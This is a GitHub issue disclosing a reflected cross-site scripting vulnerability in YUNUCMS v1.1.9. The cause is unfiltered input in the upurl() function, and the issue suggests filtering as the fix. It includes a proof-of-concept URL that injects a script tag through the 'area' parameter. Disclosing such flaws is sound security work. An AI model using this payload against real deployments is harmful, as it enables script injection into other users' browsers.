Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
There is an Reflective Cross Site Scripting vulnerability in your latest version of the CMS v1.1.9 Download link: "http://img.yunucms.com/o_1d1n2lp3h1g0m1rjfvf818epqmua.zip?attname="
In the YUNUCMSv1.1.9\app\extend\com\Page.php, No filtering to url in the upurl( ) function:
Steps To Reproduce: Open below URL in browser which supports flash. url:http://localhost/index.php/index/category/index?[xsspayload]&id=23&page=2 exp:http://localhost/index.php/index/category/index?area=shijiazhuang'"><script>alert(1)</script>&id=23&page=2 Fix: Filter the url parameter
The text was updated successfully, but these errors were encountered:
No branches or pull requests
There is an Reflective Cross Site Scripting vulnerability in your latest version of the CMS v1.1.9
Download link: "http://img.yunucms.com/o_1d1n2lp3h1g0m1rjfvf818epqmua.zip?attname="
In the YUNUCMSv1.1.9\app\extend\com\Page.php, No filtering to url in the upurl( ) function:

Steps To Reproduce:

Open below URL in browser which supports flash.
url:http://localhost/index.php/index/category/index?[xsspayload]&id=23&page=2
exp:http://localhost/index.php/index/category/index?area=shijiazhuang'"><script>alert(1)</script>&id=23&page=2
Fix:
Filter the url parameter
The text was updated successfully, but these errors were encountered: